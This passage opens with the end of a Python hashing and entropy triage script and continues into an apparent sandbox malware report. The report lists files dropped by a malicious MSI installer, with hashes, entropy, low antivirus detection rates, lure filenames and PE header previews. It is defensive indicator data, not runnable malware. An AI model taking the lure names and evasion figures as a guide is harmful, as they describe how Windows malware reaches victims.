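    """MD5, SHA-1, SHA-256 and SHA-512 in the upper-case hex form the report uses."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def describe(data: bytes) -> dict:
    """The per-file triage fields: size, 8-bit entropy and the four digests."""
    return {"size": len(data), "entropy": shannon_entropy_8bit(data), **digests(data)}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        d = describe(blob)
        print(f"{name}: size={d['size']} entropy={d['entropy']:.15f}")
        for algo in ("MD5", "SHA1", "SHA-256", "SHA-512"):
            print(f"  {algo}: {d[algo]}")
```

Running the script prints the reconstructed fields next to each name; compare the entropy lines with the report's 5.245447224305563 and 4.2783947909316655, and the digest lines with the MD5/SHA fields of the two entries above. A digest mismatch with a matching entropy means the byte order or line terminator of the reconstruction is off, not the content.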
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1793
                                                                      Entropy (8bit):7.888051089019235
                                                                      Encrypted:false
                                                                      SSDEEP:48:PCSBPCF4qYtOIt9Oxi0/1YapmAg7VZNPVs:PvCFxYzmxN3mAYNS
                                                                      MD5:FEBE516EE835A50D940B2413596527C4
                                                                      SHA1:E38B8178C37973A7E43F1EE183F08FCFFFAEC5AC
                                                                      SHA-256:2E62CCA2526CD1355D85F607DCD274F05C808DB6AD9FCA42DC9371A30DB52652
                                                                      SHA-512:C719989A043475CFC1CDF3EBAE5E27DC721F025279F7EB3F3E1FA52D1A0F440214F77986EC4D18BFE1FFC6905C512198DBA0A0299D1FE7EDA66BD0E7205E772F
                                                                      Malicious:false
                                                                      Preview:..5....\..).X.rBA..F..3^,..p.U%#O.5....q.a..U.G.......o....5...*....&O.:....T..z...d.....[.....k.8S....0..{W$HP.b2&E....u..x..,l[T.0]..Q.[*..X_,7`...m.@....@...u....r..E....P.:[.{.\.X..&>..r._ue..Y.......^....x... 4\.u.....D-...v.z.M...1.q..j.....9*a'...Y..fL)...,442$pw .|7mu....$.s..od..Bl.....@...qo.#.....n.!.I....*B.a.DA...sv.>.;..$D....`c....TiI%.-..h.>..6}]e..7..y?.5...10W13.,]&^U\.O.).a.9.s..).4*.h...LV..z9..0...F.M......S{..~.rki....Q..&.#.f3....Ob......(...m...B.Q...m.p..W....zj.=..J.6.8....t..6.......R.,m...<(m.J....1.....g...j..a........,.._....P...t.....K..|~D.%.8.zLC{...P.....{W.U..z:.k........U..D@....Q....T.V....p..Mo..B.)#.'...nu:..o....o..H..j.X.........6... (wq.K. ..K.@.....I.fK..a.4..P.wcS.... .b..'C7....ha..3.S..(.fH'.(.Jj.;...Wq8..c........7.{.7.E..-l.t.!.P.6..&:...r7.-z...|Pm.8.6.~..L..r.Z.A.o*Q......@.L...q.2 %..f.G.^...S...A/.Q.n..Rq..".VQG!..n..[:X>..5....v.L.c..zc.F.Y.p..m..>.+9..G...,g6.U..;B)..Mp.....H?F....k.\.co|....
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1626280
                                                                      Entropy (8bit):7.371352775782398
                                                                      Encrypted:false
                                                                      SSDEEP:49152:H4jyNKd2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmK2:H4Fd2Bqc8Y7IDbauSVGDzhGjThGDzhmL
                                                                      MD5:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                      SHA1:CF1BEEEC71ABBFBE8A6F47ABAAA6C1AF2FEE37DC
                                                                      SHA-256:585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
                                                                      SHA-512:AEAF1D2DA43584AE91EA032C59A945AB91F721CC3B5BB98C2C7096DFD8C728B4EBF735491E06E934B4B1C9F1CCC719F950AD6F45E212F638B52C7AF5EFCC18DB
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      • Antivirus: Virustotal, Detection: 5%
                                                                      Joe Sandbox View:
                                                                      • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious
                                                                      • Filename: arquivo.msi, Detection: malicious
                                                                      • Filename: z1Intimacao-eletronica.msi, Detection: malicious
                                                                      • Filename: Nota.msi, Detection: malicious
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@........................... .../... .......................p..p............................`......................................................CODE................................ ..`DATA....p...........................@...BSS......................................idata.../... ...0..................@....tls.........P.......0...................rdata.......`.......0..............@..P.reloc..p....p.......2..............@..P.rsrc........ ......................@..P....................................@..P........................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {A964743B-CAFF-41FA-9500-18A10960F691}, Number of Words: 10, Subject: Aplicativo Windows, Author: Microsoft, Name of Creating Application: Aplicativo Windows, Template: ;1046, Comments: Aplicativo Windows, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu May 30 18:43:02 2024, Number of Pages: 200
                                                                      Category:dropped
                                                                      Size (bytes):31430144
                                                                      Entropy (8bit):7.980096046762622
                                                                      Encrypted:false
                                                                      SSDEEP:786432:2n1stHfbfy4zTE8R0BPtznQ6rHSVx7Z7hSCyx/suqfh:5HfO4zTB8zQ6bSVx7IUu
                                                                      MD5:41EED8B68BB6DDF7BDD73D285109E460
                                                                      SHA1:6A83946536E41D65D8F52F8222A3235C9877FCF3
                                                                      SHA-256:A477E01F4AFEAEE40323A6981773AB20F7405C013F6A0398C9126E73D057616A
                                                                      SHA-512:86C89A543B15D57F68852189C488F5C806841D6F4947F4B30B4EDDC76A19EB9B00675B9B6B7A781457010A368DAF23760235BABF6BCB1281B98CDFCC59E1844D
                                                                      Malicious:false
                                                                      Preview:......................>.......................................................G.......c.......v...............................P...Q...R...S...T...U...V...W...X...........................................................................................................................................................................................................................................................................................................................................................................=...................$...5....................................................................................... ...!..."...#...,...%...&...'...(...)...*...+...-.......3.../...0...1...2...6...4...>...A...7...8...9...:...;...<...........?...@.......B...C...D...E...F...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%
                                                                      Joe Sandbox View:
                                                                      • Filename: HomeDesk.msi, Detection: malicious
                                                                      • Filename: z1Pedido-Faturado-NF-938731.cmd, Detection: malicious
                                                                      • Filename: arquivo.msi, Detection: malicious
                                                                      • Filename: 25690.01808D.msi, Detection: malicious
                                                                      • Filename: fatKCMAGKKH.msi, Detection: malicious
                                                                      • Filename: SPMServer_2024.3.5.473.exe, Detection: malicious
                                                                      • Filename: SPMServer_2024.2.1.7.exe, Detection: malicious
                                                                      • Filename: SPMServer_2024.3.1.22.exe, Detection: malicious
                                                                      • Filename: Df.mes-25664.msi, Detection: malicious
                                                                      • Filename: FatRE012024.msi, Detection: malicious
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):601920
                                                                      Entropy (8bit):6.469032452979565
                                                                      Encrypted:false
                                                                      SSDEEP:12288:g+zdBoU6TPAjp66Ulgc2zGz5gCxOWIGvn:HBoBTopk1QGz53sWIGvn
                                                                      MD5:CADBCF6F5A0199ECC0220CE23A860D89
                                                                      SHA1:073C149D68916520AEA882E588AB9A5AE083D75A
                                                                      SHA-256:42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
                                                                      SHA-512:CEBB128BDC04E6B29DF74BEDCC375A340AC037563D828AF3455DE41F31D2E464F82F85C97CA9910A4A7C819EFA906AA4A4560174F184CEE316F53E3D2B5CDCCC
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 1%
                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L...R+Jd.........."!...#.<...........W.......P...............................0......5R....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):856767
                                                                      Entropy (8bit):6.562135215687912
                                                                      Encrypted:false
                                                                      SSDEEP:24576:r/EEimJH6g7scSzMQDC5lfCn/EEimJH6g7scSzMQDC5lfCU:rOmJH6g7sJzM+C5ZC/OmJH6g7sJzM+Cz
                                                                      MD5:FABA8FE084F6302901800197DFA0914A
                                                                      SHA1:5C589D1FD18C33CFDD2CCECF38C6660025D4E14A
                                                                      SHA-256:60D3A89C5F13527C1ADF72090F4FD5B44F9FBDBA1EE132CCAAABC35D03EB1C5D
                                                                      SHA-512:A5D6D5023D54ED997B41A5274FC8F78CF690B45454913A87A20ADA710E6CFEE5BF83220E7B47F64D2AEC78DE3457F1FDB440B87C3B90364A4841ADBB5F604BF0
                                                                      Malicious:false
                                                                      Preview:...@IXOS.@.....@.h.X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..CrzA2u67LQ.msi.@.....@?....@.....@........&.{A964743B-CAFF-41FA-9500-18A10960F691}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@!....@.....@.]....&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}..C:\Users\user\Documents\.@.......@.....@.....@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}1.01:\Software\Microsoft\Aplicativo Windows\Version.@.......@.....@.....@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}..01:\Microsoft\.@.......@.....@.....@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}..01:\Microsoft\Windows\.@.......@.....@.....@......&.{4669957E-4874-4408-AF9D-19502B394F45}%.01:\Microsoft\Windows\CurrentVersion\.@.......@.....@.....@......&.{7FA8939
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):423936
                                                                      Entropy (8bit):6.554049394581909
                                                                      Encrypted:false
                                                                      SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                      MD5:768B35409005592DE2333371C6253BC8
                                                                      SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                      SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                      SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.g[..g[..g[.T.X..g[.T.^.)g[.8._..g[.8.X..g[.8.^..g[.T._..g[.T.]..g[.T.Z..g[..gZ.Kg[.^.R..g[.^....g[..g..g[.^.Y..g[.Rich.g[.................PE..L...s,Jd.........."....#..........................@.................................._....@..........................................p..8........................:..(...p...........................h...@...............l............................text.............................. ..`.rdata...R.......T..................@..@.data....7...0......................@....rsrc...8....p.......0..............@..@.reloc...:.......<...<..............@..B........................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):423936
                                                                      Entropy (8bit):6.554049394581909
                                                                      Encrypted:false
                                                                      SSDEEP:12288:B/ePEitwJH6g7scgFzMzMHf7h453V6hEFM:B/EEimJH6g7scSzMQDC5lfC
                                                                      MD5:768B35409005592DE2333371C6253BC8
                                                                      SHA1:E370B3CFD801FCDFDBEEC90B0F7CBEF5D2E6B69C
                                                                      SHA-256:33B519696A7F4B5D4714E3A363B0F0F76E6FF576A05999E482EA484AD4ACF5A5
                                                                      SHA-512:BB8FAE0FDCE3D61DAB48C1F79F3CE498159364D51FDFD2481CCA3A60D009F6134194D48EA20DE3E1F0C236BB9F6368F82D737A8153F7A1D492F44E197EA971CE
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                       • Antivirus: Virustotal, Detection: 0%
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.1640402021203538
                                                                      Encrypted:false
                                                                      SSDEEP:12:JSbX72FjbiAGiLIlHVRpZh/7777777777777777777777777vDHFLwQmIGit/l0G:JcQI5tBwQm6iF
                                                                      MD5:0CC4AC6470FD7B08EEF6FBA92F09A502
                                                                      SHA1:78E61571BAEB25846123554EA849F80F11DBBDE8
                                                                      SHA-256:B4619549A5FCD7E3ADC9A916AC49B74A8CEB32030D6FC376BEE89633B5EC8920
                                                                      SHA-512:5336E7046646EA81A96C7A8E33A123B2698F71FD7A38FEE56A3A21F94B636E17A4A04D0D08355F8D594E09EEAF3E11E5918C2DE87EFAAF113D02E76D18AE955A
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.4875809594755607
                                                                      Encrypted:false
                                                                      SSDEEP:48:U8PhYuRc06WXJ0FT5DBf7J5rISCrKAECiCyjMHoRrISCrAT:rhY13FTN57J1IrREC0M2Ir
                                                                      MD5:63900DFF48B423D3EEC328CB5353665D
                                                                      SHA1:F40D79495066948EA1F1FFB2C446DC44444B5965
                                                                      SHA-256:0263B405E39C9F3DBFA4BF7E3D6FAC7F35B6AAAAC5C041723CA234330A4D3F53
                                                                      SHA-512:D540D0283778C3A9C82FF113D5376B11E759B324BD4DC49C2986BE98A71911B7B1819D676B8880677C755CD5A27C6D31E9BC467BC558B61DD8053E606EAB8D4F
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):432221
                                                                      Entropy (8bit):5.375158855659212
                                                                      Encrypted:false
                                                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgau3:zTtbmkExhMJCIpEr+
                                                                      MD5:F3AC320F6704847BD8CA206E200F02B7
                                                                      SHA1:A9E39074656BC91F91D9100D51A5B212047798E9
                                                                      SHA-256:DC375C44099DF971A09D728EDA7D3855F705C5E1F80A1107E3BBFEC486DA420C
                                                                      SHA-512:81B70F63C73B1AF4F70094487FEABD4761A8BC3CE2CD2CA1A7AD46AB9EA9D45A0A25FB74F3761A519C3A54F9FB023CE3214712C7FAFE99BD98989A16AAB7029D
                                                                      Malicious:false
                                                                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):73728
                                                                      Entropy (8bit):0.10846291152928038
                                                                      Encrypted:false
                                                                      SSDEEP:24:eiscTxkrIipVkrSkrIipVkrKAEVkryjCyjMHV2BwG9kU+EfHG:nTerISCr9rISCrKAECiCyjMHo0Upfm
                                                                      MD5:C967BE98CB00ED3E1DA464975CB2EE6E
                                                                      SHA1:0BB4E552A9736E4A2B6D40DB69E809B423FF5794
                                                                      SHA-256:E84A5E1E6A6D2BBEC0718152E4620885F894EB80E81BE258477E9E0FD91261DE
                                                                      SHA-512:925A81673B53231BEAE11B8462F1F200B2B8B2A1B596665DB259E18C8DF5DD61A8A2BFE8F105896FE417AD290FECA6B6D3833258C1E9D92D20D1200A26EDF670
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.07152163661010089
                                                                      Encrypted:false
                                                                      SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOLgDQmIGOI+dgVky6lit/:2F0i8n0itFzDHFLwQmI5it/
                                                                      MD5:3405D0A8C5D45635BA78774CF92EAF13
                                                                      SHA1:4C867319BB41A5D350E29244D532DCBCAF81C5EA
                                                                      SHA-256:F7CF9BD5F66955C55BC88E3B77BE4EA0D88E7C433761D2B4D4D699E90B24D3B9
                                                                      SHA-512:9D81CDCBD71F0C15EB53007F7A587B512756676D3562410425D18983F4084C368099AE583AFF10DCB4040D3079C1EE5990FCF594A42CB06AE6C0900917879303
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.1980348506566416
                                                                      Encrypted:false
                                                                      SSDEEP:48:3nQuGO+CFXJpT5BBf7J5rISCrKAECiCyjMHoRrISCrAT:XQMRT/57J1IrREC0M2Ir
                                                                      MD5:DDDA60A42D496F3D8F7601D55D8196E6
                                                                      SHA1:39D9AA045B72F48DE12B5DEAF8295F0C72484F65
                                                                      SHA-256:40CFF875427762F3B66DAD7B3EA756CAEA8175D548E9DC10D7A4F651675617E6
                                                                      SHA-512:164AFFEA78272C47E57F375BE22D789FBCC3A1B711B250CEDC29BE129AC9596067013748FE39FA4AE3D2CB2BE0310C58E2149F6C127847FDE5E62185B5FAEE64
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.4875809594755607
                                                                      Encrypted:false
                                                                      SSDEEP:48:U8PhYuRc06WXJ0FT5DBf7J5rISCrKAECiCyjMHoRrISCrAT:rhY13FTN57J1IrREC0M2Ir
                                                                      MD5:63900DFF48B423D3EEC328CB5353665D
                                                                      SHA1:F40D79495066948EA1F1FFB2C446DC44444B5965
                                                                      SHA-256:0263B405E39C9F3DBFA4BF7E3D6FAC7F35B6AAAAC5C041723CA234330A4D3F53
                                                                      SHA-512:D540D0283778C3A9C82FF113D5376B11E759B324BD4DC49C2986BE98A71911B7B1819D676B8880677C755CD5A27C6D31E9BC467BC558B61DD8053E606EAB8D4F
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):1.4875809594755607
                                                                      Encrypted:false
                                                                      SSDEEP:48:U8PhYuRc06WXJ0FT5DBf7J5rISCrKAECiCyjMHoRrISCrAT:rhY13FTN57J1IrREC0M2Ir
                                                                      MD5:63900DFF48B423D3EEC328CB5353665D
                                                                      SHA1:F40D79495066948EA1F1FFB2C446DC44444B5965
                                                                      SHA-256:0263B405E39C9F3DBFA4BF7E3D6FAC7F35B6AAAAC5C041723CA234330A4D3F53
                                                                      SHA-512:D540D0283778C3A9C82FF113D5376B11E759B324BD4DC49C2986BE98A71911B7B1819D676B8880677C755CD5A27C6D31E9BC467BC558B61DD8053E606EAB8D4F
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):1.1980348506566416
                                                                      Encrypted:false
                                                                      SSDEEP:48:3nQuGO+CFXJpT5BBf7J5rISCrKAECiCyjMHoRrISCrAT:XQMRT/57J1IrREC0M2Ir
                                                                      MD5:DDDA60A42D496F3D8F7601D55D8196E6
                                                                      SHA1:39D9AA045B72F48DE12B5DEAF8295F0C72484F65
